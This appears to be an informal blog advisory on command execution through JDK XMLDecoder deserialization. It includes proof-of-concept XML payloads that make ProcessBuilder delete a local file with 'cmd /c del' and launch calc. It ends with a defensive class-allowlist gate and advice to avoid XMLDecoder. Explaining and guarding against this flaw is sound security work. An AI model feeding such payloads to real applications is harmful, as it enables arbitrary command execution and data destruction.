Yesterday at work I ran into a JDK XMLDecoder deserialization vulnerability, and it looks very dangerous! Here are two examples that show what this vulnerability can do.

Example 1: Delete a local file with XmlDecoder

First look at the contents of the xmldecoder.xml file:

<?xml version="1.0" encoding="utf-8"?>
<java version="1.8.0_151" class="java.beans.XMLDecoder">
    <object class="java.lang.ProcessBuilder">
        <array class="java.lang.String" length="4">
            <void index="0">
                <string>cmd</string>
            </void>
            <void index="1">
                <string>/c</string>
            </void>
            <void index="2">
                <string>del</string>
            </void>
            <void index="3">
                <string>e:\1.txt</string>
            </void>
        </array>
        <void method="start" />
    </object>
</java>

Let’s look at some sample code for parsing this XML file with XMLDecoder:

import java.beans.XMLDecoder;
import java.io.BufferedInputStream;
import java.io.File;
import java.io.FileInputStream;
import java.io.IOException;

private static void byXmlFile() {
    File file = new File("E:\\xmldecoder.xml");
    // readObject() is what replays the XML: it builds the ProcessBuilder and calls start()
    try (XMLDecoder xd = new XMLDecoder(new BufferedInputStream(new FileInputStream(file)))) {
        Object s2 = xd.readObject();
    } catch (IOException e) {
        e.printStackTrace();
    }
}

Decoding this file runs cmd /c del e:\1.txt, which deletes the local file e:\1.txt.

Example 2: Invoking a native program with XmlDecoder

private static void byXmlString() {
    String xml = new StringBuilder()
            .append("<?xml version=\"1.0\" encoding=\"utf-8\"?>")
            .append("<java version=\"1.8.0_151\" class=\"java.beans.XMLDecoder\">")
            .append("    <object class=\"java.lang.ProcessBuilder\">")
            .append("        <array class=\"java.lang.String\" length=\"1\">")
            .append("            <void index=\"0\">")
            .append("                <string>calc</string>")
            .append("            </void>")
            .append("        </array>")
            .append("        <void method=\"start\" />")
            .append("    </object>")
            .append("</java>")
            .toString();
    // Same decoding as before, only the input source is a String instead of a file
    try (XMLDecoder xd = new XMLDecoder(new ByteArrayInputStream(xml.getBytes()))) {
        Object s2 = xd.readObject();
    }
}

This version reads the XML from a String instead of a file, which makes no difference: it still uses the JDK's XMLDecoder class to parse the XML. When this code runs, the local calculator program is launched.

The ProcessBuilder.start() method, like Runtime.exec(), creates an operating system process; the Process object it returns can be used to control the process and obtain information about it.

The constructor of the ProcessBuilder accepts a list of commands.

public ProcessBuilder(List<String> command) {
    if (command == null)
        throw new NullPointerException();
    this.command = command;
}

Conclusion

XMLDecoder deserialization in the JDK has a security vulnerability: it can launch local applications and execute any command the system supports. Once an attacker assembles a command list and feeds it to the application, the consequences are unimaginable!

I have only used the ProcessBuilder class to demonstrate two cases of calling system programs, but this is not the only possible attack. The vulnerability still exists in JDK 1.8.0_151.

It is recommended not to use the XMLDecoder class in the JDK and to look for other, more secure XML parsing utility classes.
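Where XMLDecoder cannot be removed from existing code right away, the input can at least be screened before it is decoded. The following is an added example (not code from the original post): it scans the XML with StAX and rejects any class attribute outside a hypothetical allowlist, since XMLDecoder offers no class filter of its own; the allowlist contents and the two sample documents are constructed for illustration.

```java
import java.beans.XMLDecoder;
import java.io.ByteArrayInputStream;
import java.nio.charset.StandardCharsets;
import java.util.Set;
import javax.xml.stream.XMLInputFactory;
import javax.xml.stream.XMLStreamException;
import javax.xml.stream.XMLStreamReader;

public class XmlDecoderGate {
    // Hypothetical allowlist: only the types this application's XML is expected to contain.
    private static final Set<String> ALLOWED = Set.of(
            "java.beans.XMLDecoder", "java.lang.String", "java.util.ArrayList");

    // Returns null if every class="..." attribute is allowlisted, else the first offending name.
    public static String findDisallowedClass(byte[] xml) throws XMLStreamException {
        XMLInputFactory factory = XMLInputFactory.newInstance();
        factory.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);                   // no DTD tricks
        factory.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        XMLStreamReader reader = factory.createXMLStreamReader(new ByteArrayInputStream(xml));
        try {
            while (reader.hasNext()) {
                reader.next();
                if (!reader.isStartElement()) continue;
                // <java>, <object>, <array>, <new> and <void> can all name a type via class="..."
                String cls = reader.getAttributeValue(null, "class");
                if (cls != null && !ALLOWED.contains(cls)) return cls;
            }
        } finally {
            reader.close();
        }
        return null;
    }

    // Decode only after the gate passes; the decoder itself will instantiate whatever it is told to.
    public static Object decodeChecked(byte[] xml) throws XMLStreamException {
        String bad = findDisallowedClass(xml);
        if (bad != null) throw new SecurityException("rejected XML naming class " + bad);
        try (XMLDecoder xd = new XMLDecoder(new ByteArrayInputStream(xml))) {
            return xd.readObject();
        }
    }

    public static void main(String[] args) throws Exception {
        // Constructed samples: a plain String, and a ProcessBuilder object with no arguments.
        String benign = "<java class=\"java.beans.XMLDecoder\"><string>hello</string></java>";
        String hostile = "<java class=\"java.beans.XMLDecoder\">"
                + "<object class=\"java.lang.ProcessBuilder\"><void method=\"start\"/></object></java>";
        System.out.println(decodeChecked(benign.getBytes(StandardCharsets.UTF_8)));
        System.out.println(findDisallowedClass(hostile.getBytes(StandardCharsets.UTF_8)));
    }
}
```

The check only covers types named by a class attribute, so the allowlist must be kept as small as the application's own XML requires; it is a stopgap, not a substitute for dropping XMLDecoder for untrusted input.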

Please share this widely so that greater losses can be avoided!
